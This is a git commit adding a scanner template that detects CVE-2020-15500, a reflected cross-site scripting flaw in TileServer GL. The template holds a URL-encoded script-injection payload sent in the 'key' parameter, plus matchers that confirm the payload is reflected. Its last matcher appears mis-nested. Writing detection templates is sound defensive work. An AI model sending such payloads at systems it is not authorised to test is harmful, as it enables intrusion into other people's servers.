Added CVE-2020-15500
parent
2c0574af17
commit
b05c8f402b
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2020-15500
|
||||
|
||||
info:
|
||||
name: TileServer GL Reflected XSS
|
||||
author: Akash.C
|
||||
severity: medium
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-15500
|
||||
source: https://github.com/maptiler/tileserver-gl/issues/461
|
||||
tags: cve,cve2020,xss,tileserver
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/?key=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: word
|
||||
words:
|
||||
part: body
|
||||
- '"><script>alert(document.domain);</script>'
|
Loading…
Reference in New Issue